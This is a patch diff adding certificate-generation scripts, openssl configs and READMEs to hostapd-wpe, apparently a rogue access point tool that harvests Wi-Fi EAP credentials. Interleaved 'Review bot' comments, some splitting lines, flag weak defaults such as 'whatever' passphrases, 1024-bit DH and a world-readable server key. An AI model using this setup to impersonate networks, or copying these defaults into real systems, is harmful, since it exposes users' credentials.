1diff -rupN hostapd-2.6/hostapd/certs/bootstrap hostapd-2.6-wpe/hostapd/certs/bootstrap 2--- hostapd-2.6/hostapd/certs/bootstrap 1970-01-01 01:00:00.000000000 +0100 3+++ hostapd-2.6-wpe/hostapd/certs/bootstrap 2018-05-21 11:37:58.859577170 +0200 4@@ -0,0 +1,82 @@ 5+#!/bin/sh 6+# 7+# This is a wrapper script to create default certificates when the 8+# server first starts in debugging mode. Once the certificates have been 9+# created, this file should be deleted. 10+# 11+# Ideally, this program should be run as part of the installation of any 12+# binary package. The installation should also ensure that the permissions 13+# and owners are correct for the files generated by this script. 14+# 15+# $Id: c9d939beac8d5bdc21ea1ff9233442f9ab933297 $ 16+# 17+umask 027 18+cd `dirname $0` 19+ 20+make -h > /dev/null 2>&1 21+ 22+# 23+# If we have a working "make", then use it. Otherwise, run the commands 24+# manually. 25+# 26+if [ "$?" = "0" ]; then 27+ make all 28+ exit $? 29+fi 30+ 31+# 32+# The following commands were created by running "make -n", and edited 33+# to remove the trailing backslash, and to add "exit 1" after the commands. 34+# 35+# Don't edit the following text. Instead, edit the Makefile, and 36+# re-generate these commands. 37+# 38+if [ ! -f dh ]; then 39+ openssl dhparam -out dh 1024 || exit 1 40+ if [ -e /dev/urandom ] ; then 41+ ln -sf /dev/urandom random 42+ else 43+ date > ./random; 44+ fi 45+fi 46+ 47+if [ ! -f server.key ]; then 48+ openssl req -new -out server.csr -keyout server.key -config ./server.cnf || exit 1 49+fi 50+ 51+if [ ! -f ca.key ]; then 52+ openssl req -new -x509 -keyout ca.key -out ca.pem -days `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` -config ./ca.cnf || exit 1 53+fi 54+ 55+if [ ! -f index.txt ]; then 56+ touch index.txt 57+fi 58+ 59+if [ ! -f serial ]; then 60+ echo '01' > serial 61+fi 62+ 63+if [ ! 
-f server.crt ]; then 64+ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf || exit 1 65+fi 66+ 67+if [ ! -f server.p12 ]; then 68+ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 69+fi 70+ 71+if [ ! -f server.pem ]; then 72+ openssl pkcs12 -in server.p12 -out server.pem -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 73+ openssl verify -CAfile ca.pem server.pem || exit 1 74+fi 75+ 76+if [ ! -f ca.der ]; then 77+ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der || exit 1 78+fi 79+ 80+if [ ! -f client.key ]; then 81+ openssl req -new -out client.csr -keyout client.key -config ./client.cnf 82+fi 83+ 84+if [ ! 
-f client.crt ]; then 85+ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf 86+fi 87diff -rupN hostapd-2.6/hostapd/certs/ca.cnf hostapd-2.6-wpe/hostapd/certs/ca.cnf 88--- hostapd-2.6/hostapd/certs/ca.cnf 1970-01-01 01:00:00.000000000 +0100 89+++ hostapd-2.6-wpe/hostapd/certs/ca.cnf 2018-05-21 11:37:58.859577170 +0200 90@@ -0,0 +1,62 @@ 91+[ ca ] 92+default_ca = CA_default 93+ 94+[ CA_default ] 95+dir = ./ 96+certs = $dir 97+crl_dir = $dir/crl 98+database = $dir/index.txt 99+new_certs_dir = $dir 100+certificate = $dir/ca.pem 101+serial = $dir/serial 102+crl = $dir/crl.pem 103+private_key = $dir/ca.key 104+RANDFILE = $dir/.rand 105+name_opt = ca_default 106+cert_opt = ca_default 107+default_days = 365 108+default_crl_days = 364 109+default_md = sha256 110+preserve = no 111+policy = policy_match 112+crlDistributionPoints = URI:http://www.example.org/example_ca.crl 113+ 114+[ policy_match ] 115+countryName = match 116+stateOrProvinceName = match 117+organizationName = match 118+organizationalUnitName = optional 119+commonName = supplied 120+emailAddress = optional 121+ 122+[ policy_anything ] 123+countryName = optional 124+stateOrProvinceName = optional 125+localityName = optional 126+organizationName = optional 127+organizationalUnitName = optional 128+commonName = supplied 129+emailAddress = optional 130+ 131+[ req ] 132+prompt = no 133+distinguished_name = certificate_authority 134+default_bits = 2048 135+input_password = whatever 136+output_password = whatever 137+x509_extensions = v3_ca 138+ 139+[certificate_authority] 140+countryName = FR 141+stateOrProvinceName = Radius 142+localityName = Somewhere 143+organizationName = Example Inc. 
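Review bot: The no-`make` fallback in bootstrap generates 1024-bit Diffie-Hellman parameters (`openssl dhparam -out dh 1024 || exit 1`) while the Makefile path uses `DH_KEY_SIZE = 2048`, so the strength of the EAP-TLS/PEAP ephemeral DH exchange depends on which code path happened to run; it should be `openssl dhparam -out dh 2048 || exit 1` to match. The two client-certificate commands at the end (`openssl req ... -config ./client.cnf` and `openssl ca ... -config ./client.cnf`) are the only ones missing the `|| exit 1` that the header comment says every command was given, so a failed client step exits 0 and leaves a half-built directory. The `date > ./random` fallback when /dev/urandom is absent is effectively zero entropy and deserves at least a loud warning rather than a silent substitution.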
144+emailAddress = admin@example.org 145+commonName = "Example Certificate Authority" 146+ 147+[v3_ca] 148+subjectKeyIdentifier = hash 149+authorityKeyIdentifier = keyid:always,issuer:always 150+basicConstraints = critical,CA:true 151+crlDistributionPoints = URI:http://www.example.org/example_ca.crl 152+ 153diff -rupN hostapd-2.6/hostapd/certs/client.cnf hostapd-2.6-wpe/hostapd/certs/client.cnf 154--- hostapd-2.6/hostapd/certs/client.cnf 1970-01-01 01:00:00.000000000 +0100 155+++ hostapd-2.6-wpe/hostapd/certs/client.cnf 2018-05-21 11:37:58.859577170 +0200 156@@ -0,0 +1,53 @@ 157+[ ca ] 158+default_ca = CA_default 159+ 160+[ CA_default ] 161+dir = ./ 162+certs = $dir 163+crl_dir = $dir/crl 164+database = $dir/index.txt 165+new_certs_dir = $dir 166+certificate = $dir/ca.pem 167+serial = $dir/serial 168+crl = $dir/crl.pem 169+private_key = $dir/ca.key 170+RANDFILE = $dir/.rand 171+name_opt = ca_default 172+cert_opt = ca_default 173+default_days = 365 174+default_crl_days = 364 175+default_md = sha256 176+preserve = no 177+policy = policy_match 178+ 179+[ policy_match ] 180+countryName = match 181+stateOrProvinceName = match 182+organizationName = match 183+organizationalUnitName = optional 184+commonName = supplied 185+emailAddress = optional 186+ 187+[ policy_anything ] 188+countryName = optional 189+stateOrProvinceName = optional 190+localityName = optional 191+organizationName = optional 192+organizationalUnitName = optional 193+commonName = supplied 194+emailAddress = optional 195+ 196+[ req ] 197+prompt = no 198+distinguished_name = client 199+default_bits = 2048 200+input_password = whatever 201+output_password = whatever 202+ 203+[client] 204+countryName = FR 205+stateOrProvinceName = Radius 206+localityName = Somewhere 207+organizationName = Example Inc. 
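Review bot: `input_password = whatever` / `output_password = whatever` ship a known default passphrase for the CA private key, and because bootstrap runs unattended the CA key is created under it before anyone reads the README's instruction to change it; the same value is also passed on the command line as `-key`/`pass:` arguments, so it is visible in the process list while openssl runs. A one-line comment above the two fields would make the risk explicit: `# Default passphrase for ca.key; change before generating any CA you intend to reuse (it also ends up in passwords.mk and in argv)`. Note also that `[ CA_default ]` sets `policy = policy_match`, so certificates signed under this config must carry the same C/ST/O as the CA subject below.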
208+emailAddress = user@example.org 209+commonName = user@example.org 210diff -rupN hostapd-2.6/hostapd/certs/demoCA/cacert.pem hostapd-2.6-wpe/hostapd/certs/demoCA/cacert.pem 211--- hostapd-2.6/hostapd/certs/demoCA/cacert.pem 1970-01-01 01:00:00.000000000 +0100 212+++ hostapd-2.6-wpe/hostapd/certs/demoCA/cacert.pem 2018-05-21 11:37:58.859577170 +0200 213@@ -0,0 +1,22 @@ 214+-----BEGIN CERTIFICATE----- 215+MIIDtjCCAx+gAwIBAgIBADANBgkqhkiG9w0BAQQFADCBnzELMAkGA1UEBhMCQ0Ex 216+ETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQHEwlTb21lIENpdHkxFTATBgNVBAoT 217+DE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9jYWxob3N0MRswGQYDVQQDExJDbGll 218+bnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0BCQEWEmNsaWVudEBleGFtcGxlLmNv 219+bTAeFw0wNDAxMjUxMzI2MDdaFw0wNjAxMjQxMzI2MDdaMIGfMQswCQYDVQQGEwJD 220+QTERMA8GA1UECBMIUHJvdmluY2UxEjAQBgNVBAcTCVNvbWUgQ2l0eTEVMBMGA1UE 221+ChMMT3JnYW5pemF0aW9uMRIwEAYDVQQLEwlsb2NhbGhvc3QxGzAZBgNVBAMTEkNs 222+aWVudCBjZXJ0aWZpY2F0ZTEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGV4YW1wbGUu 223+Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUxbGXJPFkrPH/sYnbHI+/ 224+9PFDlup8sekPeNaUUXJTd4ld/lLMuZtB6A3etYsSepQ/T1jLxWKHgZL73G/s6fhx 225+58Ew01z1GIgX6bEzJJ7dKhx10xBDrodVPOx6d+8mqn10KB25t34XxkRsXdmxiLQy 226+UMoCKZY3IqEjpyawC0An/QIDAQABo4H/MIH8MB0GA1UdDgQWBBRo020+Hue8nVoF 227+cCHDY9oTZdGt4zCBzAYDVR0jBIHEMIHBgBRo020+Hue8nVoFcCHDY9oTZdGt46GB 228+paSBojCBnzELMAkGA1UEBhMCQ0ExETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQH 229+EwlTb21lIENpdHkxFTATBgNVBAoTDE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9j 230+YWxob3N0MRswGQYDVQQDExJDbGllbnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0B 231+CQEWEmNsaWVudEBleGFtcGxlLmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3 232+DQEBBAUAA4GBADPAC2ax5Xnvc6BnmCUtq41eVRH8AP0nbYDRL4NHd8Z0P9wnQ/yh 233+UHcE5LwJeeT2CsOtnug+bzRzaSKdH3cim6LpgjWdpWMCSgAWPbptbJhsC60or4UT 234+L/jw12UBvxt8Lf9ljOHmLAGZe25k4+jUNzNUzpkShHZRU5BjuFu8VIXF 235+-----END CERTIFICATE----- 236diff -rupN hostapd-2.6/hostapd/certs/Makefile hostapd-2.6-wpe/hostapd/certs/Makefile 237--- hostapd-2.6/hostapd/certs/Makefile 1970-01-01 01:00:00.000000000 +0100 238+++ 
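Review bot: `policy = policy_match` in `[ CA_default ]` requires countryName, stateOrProvinceName and organizationName of the client request to equal those of the CA certificate, so following the README's advice to edit the `[client]` section for "your country, state, etc." without making the identical edit in ca.cnf makes `openssl ca -config ./client.cnf` fail with a field-mismatch error. The `[ policy_anything ]` section is defined but never referenced; either switch to `policy = policy_anything`, or add a comment on the policy line: `# C/ST/O below must match the CA subject in ca.cnf, or signing will be refused`. The `whatever` passphrase here protects client.key and is handed to end users per the README, so it should be treated as a placeholder, not a default.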
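Review bot: demoCA/cacert.pem is not referenced by bootstrap, the Makefile or any of the .cnf files (which all set `dir = ./`), and as far as the DER can be read from the base64 it is a self-signed certificate with CN "Client certificate", a 1024-bit RSA key, an md5WithRSAEncryption signature and a validity of 2004-01-25 to 2006-01-24, i.e. long expired. Shipping an expired MD5-signed certificate in a directory whose README.wpe says generated certificates use SHA256 invites confusion and, if anyone ever points `openssl ca` at the default demoCA directory, silent reuse of stale material. It should be dropped from the patch, or a README line should state that it is an unused sample.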
hostapd-2.6-wpe/hostapd/certs/Makefile 2018-05-21 11:37:58.859577170 +0200 239@@ -0,0 +1,145 @@ 240+###################################################################### 241+# 242+# Make file to be installed in /etc/raddb/certs to enable 243+# the easy creation of certificates. 244+# 245+# See the README file in this directory for more information. 246+# 247+# $Id: cc12464c6c7754aff2f0c8d6e116708c94ff2168 $ 248+# 249+###################################################################### 250+ 251+DH_KEY_SIZE = 2048 252+ 253+# 254+# Set the passwords 255+# 256+-include passwords.mk 257+ 258+###################################################################### 259+# 260+# Make the necessary files, but not client certificates. 261+# 262+###################################################################### 263+.PHONY: all 264+all: index.txt serial dh server ca client 265+ 266+.PHONY: client 267+client: client.pem 268+ 269+.PHONY: ca 270+ca: ca.der 271+ 272+.PHONY: server 273+server: server.pem server.vrfy 274+ 275+.PHONY: verify 276+verify: server.vrfy client.vrfy 277+ 278+passwords.mk: server.cnf ca.cnf client.cnf 279+ @echo "PASSWORD_SERVER = '$(shell grep output_password server.cnf | sed 's/.*=//;s/^ *//')'" > $@ 280+ @echo "PASSWORD_CA = '$(shell grep output_password ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ 281+ @echo "PASSWORD_CLIENT = '$(shell grep output_password client.cnf | sed 's/.*=//;s/^ *//')'" >> $@ 282+ @echo "USER_NAME = '$(shell grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//')'" >> $@ 283+ @echo "CA_DEFAULT_DAYS = '$(shell grep default_days ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ 284+ 285+###################################################################### 286+# 287+# Diffie-Hellman parameters 288+# 289+###################################################################### 290+dh: 291+ openssl dhparam -out dh -2 $(DH_KEY_SIZE) 292+ 293+###################################################################### 294+# 295+# Create a new 
self-signed CA certificate 296+# 297+###################################################################### 298+ca.key ca.pem: ca.cnf 299+ @[ -f index.txt ] || $(MAKE) index.txt 300+ @[ -f serial ] || $(MAKE) serial 301+ openssl req -new -x509 -keyout ca.key -out ca.pem \ 302+ -days $(CA_DEFAULT_DAYS) -config ./ca.cnf 303+ 304+ca.der: ca.pem 305+ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der 306+ 307+###################################################################### 308+# 309+# Create a new server certificate, signed by the above CA. 310+# 311+###################################################################### 312+server.csr server.key: server.cnf 313+ openssl req -new -out server.csr -keyout server.key -config ./server.cnf 314+ 315+server.crt: server.csr ca.key ca.pem 316+ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf 317+ 318+server.p12: server.crt 319+ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) 320+ 321+server.pem: server.p12 322+ openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) 323+ 324+.PHONY: server.vrfy 325+server.vrfy: ca.pem 326+ @openssl verify -CAfile ca.pem server.pem 327+ 328+###################################################################### 329+# 330+# Create a new client certificate, signed by the the above server 331+# certificate. 
332+# 333+###################################################################### 334+client.csr client.key: client.cnf 335+ openssl req -new -out client.csr -keyout client.key -config ./client.cnf 336+ 337+client.crt: client.csr ca.pem ca.key 338+ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf 339+ 340+client.p12: client.crt 341+ openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12 -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) 342+ 343+client.pem: client.p12 344+ openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) 345+ cp client.pem $(USER_NAME).pem 346+ 347+.PHONY: client.vrfy 348+client.vrfy: ca.pem client.pem 349+ c_rehash . 350+ openssl verify -CApath . client.pem 351+ 352+###################################################################### 353+# 354+# Miscellaneous rules. 355+# 356+###################################################################### 357+index.txt: 358+ @touch index.txt 359+ 360+serial: 361+ @echo '01' > serial 362+ 363+print: 364+ openssl x509 -text -in server.crt 365+ 366+printca: 367+ openssl x509 -text -in ca.pem 368+ 369+install: 370+ install -d $(DESTDIR)/etc/hostapd-wpe 371+ install -m 644 dh $(DESTDIR)/etc/hostapd-wpe 372+ install -m 644 ca.pem $(DESTDIR)/etc/hostapd-wpe 373+ install -m 644 server.pem $(DESTDIR)/etc/hostapd-wpe 374+ install -m 644 server.key $(DESTDIR)/etc/hostapd-wpe 375+ 376+clean: 377+ @rm -f *~ *old client.csr client.key client.crt client.p12 client.pem 378+ 379+# 380+# Make a target that people won't run too often. 
381+# 382+destroycerts: 383+ rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \ 384+ serial* *\.0 *\.1 385diff -rupN hostapd-2.6/hostapd/certs/README hostapd-2.6-wpe/hostapd/certs/README 386--- hostapd-2.6/hostapd/certs/README 1970-01-01 01:00:00.000000000 +0100 387+++ hostapd-2.6-wpe/hostapd/certs/README 2018-05-21 11:37:58.859577170 +0200 388@@ -0,0 +1,226 @@ 389+ This directory contains scripts to create the server certificates. 390+To make a set of default (i.e. test) certificates, simply type: 391+ 392+$ ./bootstrap 393+ 394+ The "openssl" command will be run against the sample configuration 395+files included here, and will make a self-signed certificate authority 396+(i.e. root CA), and a server certificate. This "root CA" should be 397+installed on any client machine needing to do EAP-TLS, PEAP, or 398+EAP-TTLS. 399+ 400+ The Microsoft "XP Extensions" will be automatically included in the 401+server certificate. Without those extensions Windows clients will 402+refuse to authenticate to FreeRADIUS. 403+ 404+ The root CA and the "XP Extensions" file also contain a crlDistributionPoints 405+attribute. The latest release of Windows Phone needs this to be present 406+for the handset to validate the RADIUS server certificate. The RADIUS 407+server must have the URI defined but the CA need not have...however it 408+is best practice for a CA to have a revocation URI. Note that whilst 409+the Windows Mobile client cannot actually use the CRL when doing 802.1X 410+it is recommended that the URI be an actual working URL and contain a 411+revocation format file as there may be other OS behaviour at play and 412+future OSes that may do something with that URI. 413+ 414+ In general, you should use self-signed certificates for 802.1x (EAP) 415+authentication. When you list root CAs from other organisations in 416+the "ca_file", you permit them to masquerade as you, to authenticate 417+your users, and to issue client certificates for EAP-TLS. 
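Review bot: The `install` target copies the TLS private key world-readable (`install -m 644 server.key $(DESTDIR)/etc/hostapd-wpe`), which lets any local user impersonate the rogue AP's RADIUS/EAP server; it should be `install -m 600 server.key $(DESTDIR)/etc/hostapd-wpe` (dh, ca.pem and server.pem are public and can stay 644). The `passwords.mk` rule writes all three passphrases to a plaintext file that `-include` then reads on every invocation, yet neither `clean` nor `destroycerts` removes it, so the passphrases outlive the certificates; adding `passwords.mk` to the `destroycerts` rm list would close that. The comment above the client rules says the client certificate is "signed by the above server certificate", but `client.crt` is signed with `-keyfile ca.key -cert ca.pem`, so the comment should read "signed by the above CA".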
418+ 419+ If FreeRADIUS was configured to use OpenSSL, then simply starting 420+the server in root in debugging mode should also create test 421+certificates, i.e.: 422+ 423+$ radiusd -X 424+ 425+ That will cause the EAP-TLS module to run the "bootstrap" script in 426+this directory. The script will be executed only once, the first time 427+the server has been installed on a particular machine. This bootstrap 428+script SHOULD be run on installation of any pre-built binary package 429+for your OS. In any case, the script will ensure that it is not run 430+twice, and that it does not over-write any existing certificates. 431+ 432+ If you already have CA and server certificates, rename (or delete) 433+this directory, and create a new "certs" directory containing your 434+certificates. Note that the "make install" command will NOT 435+over-write your existing "raddb/certs" directory, which means that the 436+"bootstrap" command will not be run. 437+ 438+ 439+ NEW INSTALLATIONS OF FREERADIUS 440+ 441+ 442+ We suggest that new installations use the test certificates for 443+initial tests, and then create real certificates to use for normal 444+user authentication. See the instructions below for how to create the 445+various certificates. The old test certificates can be deleted by 446+running the following command: 447+ 448+$ rm -f *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt* 449+ 450+ Then, follow the instructions below for creating real certificates. 451+ 452+ Once the final certificates have been created, you can delete the 453+"bootstrap" command from this directory, and delete the 454+"make_cert_command" configuration from the "tls" sub-section of 455+eap.conf. 456+ 457+ If you do not want to enable EAP-TLS, PEAP, or EAP-TTLS, then delete 458+the relevant sub-sections from the "eap.conf" file. 
459+ 460+ 461+ MAKING A ROOT CERTIFICATE 462+ 463+ 464+$ vi ca.cnf 465+ 466+ Edit the "input_password" and "output_password" fields to be the 467+ password for the CA certificate. 468+ 469+ Edit the [certificate_authority] section to have the correct values 470+ for your country, state, etc. 471+ 472+$ make ca.pem 473+ 474+ This step creates the CA certificate. 475+ 476+$ make ca.der 477+ 478+ This step creates the DER format of the self-signed certificate, 479+ which is can be imported into Windows. 480+ 481+ 482+ MAKING A SERVER CERTIFICATE 483+ 484+ 485+$ vi server.cnf 486+ 487+ Edit the "input_password" and "output_password" fields to be the 488+ password for the server certificate. 489+ 490+ Edit the [server] section to have the correct values for your 491+ country, state, etc. Be sure that the commonName field here is 492+ different from the commonName for the CA certificate. 493+ 494+$ make server.pem 495+ 496+ This step creates the server certificate. 497+ 498+ If you have an existing certificate authority, and wish to create a 499+ certificate signing request for the server certificate, edit 500+ server.cnf as above, and type the following command. 501+ 502+$ make server.csr 503+ 504+ You will have to ensure that the certificate contains the XP 505+ extensions needed by Microsoft clients. 506+ 507+ 508+ MAKING A CLIENT CERTIFICATE 509+ 510+ 511+ Client certificates are used by EAP-TLS, and optionally by EAP-TTLS 512+and PEAP. The following steps outline how to create a client 513+certificate that is signed by the server certificate created above. 514+You will have to have the password for the server certificate in the 515+"input_password" and "output_password" fields of the server.cnf file. 516+ 517+ 518+$ vi client.cnf 519+ 520+ Edit the "input_password" and "output_password" fields to be the 521+ password for the client certificate. You will have to give these 522+ passwords to the end user who will be using the certificates. 
523+ 524+ Edit the [client] section to have the correct values for your 525+ country, state, etc. Be sure that the commonName field here is 526+ the User-Name that will be used for logins! 527+ 528+$ make client.pem 529+ 530+ The users certificate will be in "emailAddress.pem", 531+ i.e. "user@example.com.pem". 532+ 533+ To create another client certificate, just repeat the steps for 534+ making a client certificate, being sure to enter a different login 535+ name for "commonName", and a different password. 536+ 537+ 538+ PERFORMANCE 539+ 540+ 541+ EAP performance for EAP-TLS, TTLS, and PEAP is dominated by SSL 542+ calculations. That is, a normal system can handle PAP 543+ authentication at a rate of 10k packets/s. However, SSL involves 544+ RSA calculations, which are very expensive. To benchmark your system, 545+ do: 546+ 547+$ openssl speed rsa 548+ 549+ or 550+ 551+$ openssl speed rsa2048 552+ 553+ to test 2048 bit keys. 554+ 555+ A 1GHz system will likely do 30 calculations/s. A 2GHz system may 556+ do 50 calculations/s, or more. That number is also the number of 557+ authentications/s that can be done for EAP-TLS (or TTLS, or PEAP). 558+ 559+ 560+ COMPATIBILITY 561+ 562+The certificates created using this method are known to be compatible 563+with ALL operating systems. Some common issues are: 564+ 565+ - Windows requires certain OIDs in the certificates. If it doesn't 566+ see them, it will stop doing EAP. The most visible effect is 567+ that the client starts EAP, gets a few Access-Challenge packets, 568+ and then a little while later re-starts EAP. If this happens, see 569+ the FAQ, and the comments in raddb/eap.conf for how to fix it. 570+ 571+ - Windows requires the root certificates to be on the client PC. 572+ If it doesn't have them, you will see the same issue as above. 573+ 574+ - Windows XP post SP2 has a bug where it has problems with 575+ certificate chains. i.e. 
if the server certificate is an 576+ intermediate one, and not a root one, then authentication will 577+ silently fail, as above. 578+ 579+ - Some versions of Windows CE cannot handle 4K RSA certificates. 580+ They will (again) silently fail, as above. 581+ 582+ - In none of these cases will Windows give the end user any 583+ reasonable error message describing what went wrong. This leads 584+ people to blame the RADIUS server. That blame is misplaced. 585+ 586+ - Certificate chains of more than 64K bytes are known to not work. 587+ This is a problem in FreeRADIUS. However, most clients cannot 588+ handle 64K certificate chains. Most Access Points will shut down 589+ the EAP session after about 50 round trips, while 64K certificate 590+ chains will take about 60 round trips. So don't use large 591+ certificate chains. They will only work after everyone upgrade 592+ everything in the network. 593+ 594+ - All other operating systems are known to work with EAP and 595+ FreeRADIUS. This includes Linux, *BSD, Mac OS X, Solaris, 596+ Symbian, along with all known embedded systems, phones, WiFi 597+ devices, etc. 598+ 599+ - Someone needs to ask Microsoft to please stop making life hard for 600+ their customers. 601+ 602+ 603+ SECURITY CONSIDERATIONS 604+ 605+The default certificate configuration files uses MD5 for message 606+digests, to maintain compatibility with network equipment that 607+supports only this algorithm. 608+ 609+MD5 has known weaknesses and is discouraged in favour of SHA1 (see 610+http://www.kb.cert.org/vuls/id/836068 for details). If your network 611+equipment supports the SHA1 signature algorithm, we recommend that you 612+change the "ca.cnf", "server.cnf", and "client.cnf" files to specify 613+the use of SHA1 for the certificates. To do this, change the 614+'default_md' entry in those files from 'md5' to 'sha1'. 
615diff -rupN hostapd-2.6/hostapd/certs/README.wpe hostapd-2.6-wpe/hostapd/certs/README.wpe 616--- hostapd-2.6/hostapd/certs/README.wpe 1970-01-01 01:00:00.000000000 +0100 617+++ hostapd-2.6-wpe/hostapd/certs/README.wpe 2018-05-21 11:37:58.859577170 +0200 618@@ -0,0 +1,13 @@ 619+# Certificate creation for Hostapd-WPE # 620+######################################## 621+ 622+Usage: 623+ 624+make clean 625+./bootstrap 626+make install 627+ 628+Notes: 629+- Windows 10 (and possibly any Windows starting from Vista) will fail EAP 630+ if certificates signed with MD5 are used. 631+- Generated certificates used a SHA256 signature. 632diff -rupN hostapd-2.6/hostapd/certs/server.cnf hostapd-2.6-wpe/hostapd/certs/server.cnf 633--- hostapd-2.6/hostapd/certs/server.cnf 1970-01-01 01:00:00.000000000 +0100 634+++ hostapd-2.6-wpe/hostapd/certs/server.cnf 2018-05-21 11:37:58.859577170 +0200 635@@ -0,0 +1,54 @@ 636+[ ca ] 637+default_ca = CA_default 638+ 639+[ CA_default ] 640+dir = ./ 641+certs = $dir 642+crl_dir = $dir/crl 643+database = $dir/index.txt 644+new_certs_dir = $dir 645+certificate = $dir/server.pem 646+serial = $dir/serial 647+crl = $dir/crl.pem 648+private_key = $dir/server.key 649+RANDFILE = $dir/.rand 650+name_opt = ca_default 651+cert_opt = ca_default 652+default_days = 60 653+default_crl_days = 30 654+default_md = sha256 655+preserve = no 656+policy = policy_match 657+ 658+[ policy_match ] 659+countryName = match 660+stateOrProvinceName = match 661+organizationName = match 662+organizationalUnitName = optional 663+commonName = supplied 664+emailAddress = optional 665+ 666+[ policy_anything ] 667+countryName = optional 668+stateOrProvinceName = optional 669+localityName = optional 670+organizationName = optional 671+organizationalUnitName = optional 672+commonName = supplied 673+emailAddress = optional 674+ 675+[ req ] 676+prompt = no 677+distinguished_name = server 678+default_bits = 2048 679+input_password = whatever 680+output_password = whatever 681+ 
682+[server] 683+countryName = FR 684+stateOrProvinceName = Radius 685+localityName = Somewhere 686+organizationName = Example Inc. 687+emailAddress = admin@example.org 688+commonName = "Example Server Certificate" 689+ 690diff -rupN hostapd-2.6/hostapd/certs/xpextensions hostapd-2.6-wpe/hostapd/certs/xpextensions 691--- hostapd-2.6/hostapd/certs/xpextensions 1970-01-01 01:00:00.000000000 +0100 692+++ hostapd-2.6-wpe/hostapd/certs/xpextensions 2018-05-21 11:37:58.859577170 +0200 693@@ -0,0 +1,24 @@ 694+# 695+# File containing the OIDs required for Windows. 696+# 697+# http://support.microsoft.com/kb/814394/en-us 698+# 699+[ xpclient_ext] 700+extendedKeyUsage = 1.3.6.1.5.5.7.3.2 701+crlDistributionPoints = URI:http://www.example.com/example_ca.crl 702+ 703+[ xpserver_ext] 704+extendedKeyUsage = 1.3.6.1.5.5.7.3.1 705+crlDistributionPoints = URI:http://www.example.com/example_ca.crl 706+ 707+# 708+# Add this to the PKCS#7 keybag attributes holding the client's private key 709+# for machine authentication. 710+# 711+# the presence of this OID tells Windows XP that the cert is intended 712+# for use by the computer itself, and not by an end-user. 713+# 714+# The other solution is to use Microsoft's web certificate server 715+# to generate these certs. 716+# 717+# 1.3.6.1.4.1.311.17.2 718diff -rupN hostapd-2.6/hostapd/.config hostapd-2.6-wpe/hostapd/.config 719--- hostapd-2.6/hostapd/.config 1970-01-01 01:00:00.000000000 +0100 720+++ hostapd-2.6-wpe/hostapd/.config 2018-05-21 11:37:58.859577170 +0200 721@@ -0,0 +1,345 @@ 722+# Wireless Pawn Edition HostAPd configuration file 723+# 724+# This file lists the configuration options that are used when building the 725+# hostapd binary. All lines starting with # are ignored. Configuration option 726+# lines must be commented out complete, if they are not to be included, i.e., 727+# just setting VARIABLE=n is not disabling that variable. 
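Review bot: `default_days = 60` in this file's `[ CA_default ]` is what sets the lifetime of server.crt, because bootstrap and the Makefile sign it with `openssl ca ... -config ./server.cnf` and no `-days`, so the server certificate expires two months after generation while the CA lives 365 days; that is fine for an engagement tool but should be stated, e.g. `# Lifetime of server.crt (this config is the one passed to 'openssl ca' when signing the server request)`. The `certificate = $dir/server.pem` and `private_key = $dir/server.key` entries are overridden by the explicit `-cert ca.pem -keyfile ca.key` on every invocation and misleadingly suggest the server cert signs itself; a comment saying they are unused, or pointing them at ca.pem/ca.key, would avoid that reading. As in client.cnf, `policy = policy_match` means the `[server]` C/ST/O must equal the CA subject or signing fails.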
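Review bot: The `crlDistributionPoints` URI in both `xpclient_ext` and `xpserver_ext` is `http://www.example.com/example_ca.crl`, while ca.cnf stamps the CA with `http://www.example.org/example_ca.crl`, so the issued leaf certificates advertise a different CRL host than their issuer; the README in this same patch asks for a single, working URL, so the two files should agree, e.g. `crlDistributionPoints = URI:http://www.example.org/example_ca.crl` here. Neither extension section adds `basicConstraints = CA:FALSE` or a `keyUsage`, so the leaf certificates carry only an EKU; most validators treat a v3 certificate without basicConstraints as a non-CA, but making it explicit (`basicConstraints = CA:FALSE`) costs nothing and removes the ambiguity — worth confirming against the Windows client behaviour the file is tuned for.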
